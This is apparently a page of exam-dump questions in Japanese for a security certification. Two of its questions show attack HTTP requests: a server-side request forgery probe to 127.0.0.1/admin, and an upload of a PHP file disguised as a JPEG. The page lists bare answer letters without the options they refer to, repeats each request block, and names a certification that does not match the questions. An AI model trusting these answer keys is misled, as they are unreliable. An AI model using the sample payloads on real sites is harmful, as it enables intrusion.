ISC CAP - Certified Authorization Professional (CAP日本語版) - CAP日本語 FREE EXAM DUMPS QUESTIONS & ANSWERS
以下のスクリーンショットでは、攻撃者はどの脆弱性を悪用しようとしていますか?
リクエスト
POST /dashboard/userdata HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Cookie: JSESSIONID=7576572ce167b5634ie646de967c759643d53031 Te: trailers Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 36 useragent=http://127.0.0.1/admin PrettyRaw | Hex | php | curl | ln | Pretty HTTP/1.1 200 OK Date: Fri, 09 Dec 2022 11:42:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 12746 Connection: keep-alive X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Request-ID: 65403d71e8745d5e1fe205f44d531 Content-Length: 12746
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>
Admin Panel
</title>
リクエスト
POST /dashboard/userdata HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Cookie: JSESSIONID=7576572ce167b5634ie646de967c759643d53031 Te: trailers Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 36 useragent=http://127.0.0.1/admin PrettyRaw | Hex | php | curl | ln | Pretty HTTP/1.1 200 OK Date: Fri, 09 Dec 2022 11:42:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 12746 Connection: keep-alive X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Request-ID: 65403d71e8745d5e1fe205f44d531 Content-Length: 12746
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>
Admin Panel
</title>
Correct Answer: B
Vote an answer
Explanation: Only visible for FreeCram members. You can sign-up / login (it's free).
次の HTTP 応答ヘッダーのうち、クライアントが最も安全な方法で HTTP 応答をキャッシュすることを妨げるものはどれですか。
Correct Answer: B
Vote an answer
Explanation: Only visible for FreeCram members. You can sign-up / login (it's free).
次のどれが正しいでしょうか?
Correct Answer: C
Vote an answer
Explanation: Only visible for FreeCram members. You can sign-up / login (it's free).
次のどれが対称鍵暗号化アルゴリズムではありませんか?
Correct Answer: C
Vote an answer
Explanation: Only visible for FreeCram members. You can sign-up / login (it's free).
SQLインジェクション脆弱性に対する主な防御策を決定する
Correct Answer: C
Vote an answer
Explanation: Only visible for FreeCram members. You can sign-up / login (it's free).
以下のスクリーンショットでは、攻撃者はどの脆弱性を悪用しようとしていますか?
POST /upload.php HTTP/1.1
Host: example.com
Cookie: session=xyz123;JSESSIONID=abc123
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) rv:107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW Content-Length: 12345 Connection: keep-alive Content-Disposition: form-data; name="avatar"; filename="malicious.php" Content-Type: image/jpeg
<?php
phpinfo();
?>
POST /upload.php HTTP/1.1
Host: example.com
Cookie: session=xyz123;JSESSIONID=abc123
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) rv:107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW Content-Length: 12345 Connection: keep-alive Content-Disposition: form-data; name="avatar"; filename="malicious.php" Content-Type: image/jpeg
<?php
phpinfo();
?>
Correct Answer: D
Vote an answer
Explanation: Only visible for FreeCram members. You can sign-up / login (it's free).